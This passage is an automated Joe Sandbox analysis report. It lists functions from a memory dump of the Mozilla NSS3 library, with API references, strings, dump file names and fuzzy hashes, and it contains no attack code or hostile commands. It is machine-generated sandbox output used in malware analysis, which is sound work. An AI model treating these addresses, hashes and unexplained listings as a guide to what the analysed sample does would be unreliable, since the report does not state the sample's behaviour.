PL_FreeArenaPool.NSS3(?), ref: 6C779024
PL_FinishArenaPool.NSS3(?), ref: 6C77902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C77903E

Strings

security, xrefs: 6C778EE7

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 9d81ae068b6563fe48dc988b5cdde47f41d102abdb7d0b4f1259771fb5c9256f
Instruction ID: 6cb2bf503867ded2281200304f10dbf1a2b2bdd9883991ff76bca0b1bb71cb97
Opcode Fuzzy Hash: 9d81ae068b6563fe48dc988b5cdde47f41d102abdb7d0b4f1259771fb5c9256f
Instruction Fuzzy Hash: 89514A71608204ABDB305A58DF49FAB37A8AB8675CF45083EF455A7B40D771E908C7A3

Function 6C7A4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C7A4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4EC7

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C7A4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C7A4F68

Strings

pTemplate = 0x%p, xrefs: 6C7A4F4A
(CK_INVALID_HANDLE), xrefs: 6C7A4EC0, 6C7A4F13
C_GetAttributeValue, xrefs: 6C7A4E7E
hSession = 0x%x, xrefs: 6C7A4EA2, 6C7A4EB2
ulCount = %d, xrefs: 6C7A4F63
hObject = 0x%x, xrefs: 6C7A4EF5, 6C7A4F05

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: d11c6b2b8f779a869b5f8764835bcce03363dcfa2fd1b2be586aaf6653e6225e
Instruction ID: eb5d7e591c1abf3e4ff91e78d27b30943b75bb2dfa76bd84ccd9e7ab929c6c4f
Opcode Fuzzy Hash: d11c6b2b8f779a869b5f8764835bcce03363dcfa2fd1b2be586aaf6653e6225e
Instruction Fuzzy Hash: 5F41E335602104ABDB209F98DF4CF9A77B5EB4631DF089835E80857B12DB35BD0ADBA1

Function 6C7A4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C7A4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4D37

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C7A4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C7A4E20

Strings

pulSize = 0x%p, xrefs: 6C7A4DB7
(CK_INVALID_HANDLE), xrefs: 6C7A4D30, 6C7A4D83
hSession = 0x%x, xrefs: 6C7A4D12, 6C7A4D22
C_GetObjectSize, xrefs: 6C7A4CEE
*pulSize = 0x%x, xrefs: 6C7A4E1B
hObject = 0x%x, xrefs: 6C7A4D65, 6C7A4D75

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: e7bb931f9b4356c09efd39c2b8af564d6a2924177f5cbc88cec5bbada6506c2a
Instruction ID: f59eb13f13c76fc55927f1081b007e23a74c06f73c0d56342d509d698f3e0e2b
Opcode Fuzzy Hash: e7bb931f9b4356c09efd39c2b8af564d6a2924177f5cbc88cec5bbada6506c2a
Instruction Fuzzy Hash: 6F41F831601104AFDB208B94DF8DF6A7775EB4631DF048935E9085BB12DB36BC09D791

Function 6C7A2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C7A2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A2F63

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C7A2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C7A2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C7A2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C7A2FE7

Strings

pNewPin = 0x%p, xrefs: 6C7A2FC9
(CK_INVALID_HANDLE), xrefs: 6C7A2F5C
ulOldLen = %d, xrefs: 6C7A2FB0
ulNewLen = %d, xrefs: 6C7A2FE2
hSession = 0x%x, xrefs: 6C7A2F3E, 6C7A2F4E
C_SetPIN, xrefs: 6C7A2F21
pOldPin = 0x%p, xrefs: 6C7A2F95

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: 47b768b44927e9d6c121cb5c0a6d552c5ba272305c98d09644894273daeff468
Instruction ID: 8d5afb632fc2df0e8a4309bbd4b11b99a74c521681291e652a9b0b1a17565622
Opcode Fuzzy Hash: 47b768b44927e9d6c121cb5c0a6d552c5ba272305c98d09644894273daeff468
Instruction Fuzzy Hash: C831D235602154ABCB209F99CF4CE5A77B1EB4A31DF048535E808A7B12DB34BC09CBD1

Function 6C7727F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

CERT_GetCommonName.NSS3(?), ref: 6C772801
CERT_GetOrgUnitName.NSS3(?), ref: 6C772810
CERT_GetOrgName.NSS3(?), ref: 6C772821
PR_smprintf.NSS3(6C8AAAF9,?), ref: 6C772869
PR_smprintf.NSS3(%s - %s #%d,00000000,?,00000002), ref: 6C77287D
PR_smprintf.NSS3(%s #%d,?,00000001), ref: 6C772890
CERT_FindCertByNickname.NSS3(?,00000000), ref: 6C7728A8
CERT_DestroyCertificate.NSS3(00000000), ref: 6C7728B5
free.MOZGLUE(00000000), ref: 6C7728BE
free.MOZGLUE(00000000), ref: 6C7728D2
free.MOZGLUE(?), ref: 6C7728E3
PORT_Strdup_Util.NSS3(Unknown CA), ref: 6C772905

Strings

Unknown CA, xrefs: 6C772900
%s - %s, xrefs: 6C772855
%s - %s #%d, xrefs: 6C772878

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: NameR_smprintffree$CertCertificateCommonDestroyFindNicknameStrdup_UnitUtil
String ID: %s - %s$%s - %s #%d$Unknown CA
API String ID: 778386754-45099391
Opcode ID: 86c8d14b8765c118aaf796cadea15ebfd78489e3296cead31a454ff064e99052
Instruction ID: e73e1d8ad49b0848d4c382254d77d01f0f9b52a98fa4c0d2f550ee2f703cb736
Opcode Fuzzy Hash: 86c8d14b8765c118aaf796cadea15ebfd78489e3296cead31a454ff064e99052
Instruction Fuzzy Hash: 7431DBF2E0121AA7EF305BA65F4CADB7668AF1534CF180534E92992B01F723D51992F3

Function 6C83CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C83CC7B), ref: 6C83CD7A

Part of subcall function 6C83CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C7AC1A8,?), ref: 6C83CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C83CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CD8E

Part of subcall function 6C7605C0: PR_EnterMonitor.NSS3 ref: 6C7605D1
Part of subcall function 6C7605C0: PR_ExitMonitor.NSS3 ref: 6C7605EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C83CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C83CE48

Strings

ws2_32.dll, xrefs: 6C83CD75
getaddrinfo, xrefs: 6C83CD88, 6C83CDF9
wship6.dll, xrefs: 6C83CDE3
freeaddrinfo, xrefs: 6C83CD9F, 6C83CE10
getnameinfo, xrefs: 6C83CDB2, 6C83CE23

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: e258a63189f96e4154e8f37dc9ed063072da3045cb337dc15e230a8b019999f7
Instruction ID: af849f89bd16e9b2b368414adff6a1678242f668c37f7a19fcd3f7a5c5c82179
Opcode Fuzzy Hash: e258a63189f96e4154e8f37dc9ed063072da3045cb337dc15e230a8b019999f7
Instruction Fuzzy Hash: D111A5E5E0213112DB3166FA7E089AA38585F0225DF146E39F81992F43FB15D905C7E6

Function 6C7B4540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON

Download Yara Rule

APIs

PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C7B4590
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B471C
TlsGetValue.KERNEL32 ref: 6C7B477C
EnterCriticalSection.KERNEL32(?), ref: 6C7B479A
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C7B484A
PK11_FreeSymKey.NSS3(?), ref: 6C7B4858
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B486A
PR_Unlock.NSS3(?), ref: 6C7B487E

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PK11_FreeSymKey.NSS3(?), ref: 6C7B488C
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B489C
PK11_GetInternalSlot.NSS3 ref: 6C7B48B2
PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C797F9D), ref: 6C7B48EC
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C7B492A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B4949
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4977
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B4987
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B499B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
String ID:
API String ID: 1673584487-0
Opcode ID: 2d3902dc39d70b7eedac9c8ab1d4194ac0b6ee8875c218c5ac194ae3d03b081b
Instruction ID: be2d06d419bad8defece355d8503ea05fddee6c9b41df71794ec7afdd56b6826
Opcode Fuzzy Hash: 2d3902dc39d70b7eedac9c8ab1d4194ac0b6ee8875c218c5ac194ae3d03b081b
Instruction Fuzzy Hash: 3EE17A75D002599FDB20CF28CD48BAEBBB5EF04308F1481A9E819A7751E7729A94DF90

Function 6C7E0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,~l), ref: 6C7E0C81

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

Part of subcall function 6C7B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C7B95DC,00000000,00000000,00000000,?,6C7B95DC,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0CC4

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7E0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7E0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7E0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C7E0D7D
free.MOZGLUE(00000000), ref: 6C7E0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0DC1
free.MOZGLUE(00000000), ref: 6C7E0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7E0E0F

Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95E0
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95F5
Part of subcall function 6C7B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C7B9609
Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B961D
Part of subcall function 6C7B95C0: PK11_GetInternalSlot.NSS3 ref: 6C7B970B
Part of subcall function 6C7B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C7B9756
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?), ref: 6C7B9767
Part of subcall function 6C7B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C7B977E
Part of subcall function 6C7B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B978E

Strings

*,~l, xrefs: 6C7E0C69, 6C7E0DE0, 6C7E0C80, 6C7E0C8B, 6C7E0CAF
-$~l, xrefs: 6C7E0C64
*,~l, xrefs: 6C7E0DCC

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,~l$*,~l$-$~l
API String ID: 3136566230-3769478742
Opcode ID: ef63f6b7c8b5465c02eccb779cf08eecd39ef6f84c70c67d9531c1960827a40a
Instruction ID: c2355abc624eadbf6f39c9a0fa2ac4c72822aaeb98c48dc68dc1edb561a9b45a
Opcode Fuzzy Hash: ef63f6b7c8b5465c02eccb779cf08eecd39ef6f84c70c67d9531c1960827a40a
Instruction Fuzzy Hash: 5141B4B2900246ABEB00DF65DE4ABAF7678BF0530CF140134ED1567741EB35AA54DBE2

Function 6C7D6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C8A1DE0,?), ref: 6C7D6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7D6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C7D6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C7D6D82
DER_GetInteger_Util.NSS3(?), ref: 6C7D6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7D6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C7D6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C7D6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C7D6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C7D6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7D7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C7D7033
free.MOZGLUE(?), ref: 6C7D703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C7D7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C7D7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7D70AF

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 31fa6d9fe253f51bad29fd5119871cfdc30181a1f97bd8e5c858ca383d5f17c5
Instruction ID: 1ee7d1d60f0f330d4a9b04a4e9f37032468354f59850673b84eb8cf076833c14
Opcode Fuzzy Hash: 31fa6d9fe253f51bad29fd5119871cfdc30181a1f97bd8e5c858ca383d5f17c5
Instruction Fuzzy Hash: 4AA119719042019BEB009F24DF49B5A32A4EB8130CF268D39E958DBB81F735FA49C793

Function 6C79AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF39
PR_Unlock.NSS3(?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF69
TlsGetValue.KERNEL32 ref: 6C79B06B
EnterCriticalSection.KERNEL32(?), ref: 6C79B083
PR_Unlock.NSS3(?), ref: 6C79B0A4
TlsGetValue.KERNEL32 ref: 6C79B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C79B0D9
PR_Unlock.NSS3 ref: 6C79B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79B182

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C79B177

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1C2

Part of subcall function 6C7C1560: TlsGetValue.KERNEL32(00000000,?,6C790844,?), ref: 6C7C157A
Part of subcall function 6C7C1560: EnterCriticalSection.KERNEL32(?,?,?,6C790844,?), ref: 6C7C158F
Part of subcall function 6C7C1560: PR_Unlock.NSS3(?,?,?,?,6C790844,?), ref: 6C7C15B2

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 8bf9f46cf99945868471606e270b3777f8cb5ef9ca3bbefbe9a8fb5a489b0e58
Instruction ID: 852677da9026b2a56527c403fcd75b1a3831c76fee9ff4b250ee04c487d8560f
Opcode Fuzzy Hash: 8bf9f46cf99945868471606e270b3777f8cb5ef9ca3bbefbe9a8fb5a489b0e58
Instruction Fuzzy Hash: 1BA1C1B1E002069BEF109F64ED49BAAB7B4FF05308F104134E905A7B52E731E955CBE1

Function 6C7BE550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7BE5A0

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

memcpy.VCRUNTIME140(?,?,?), ref: 6C7BE5F2

Strings

0, xrefs: 6C7BEA4D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

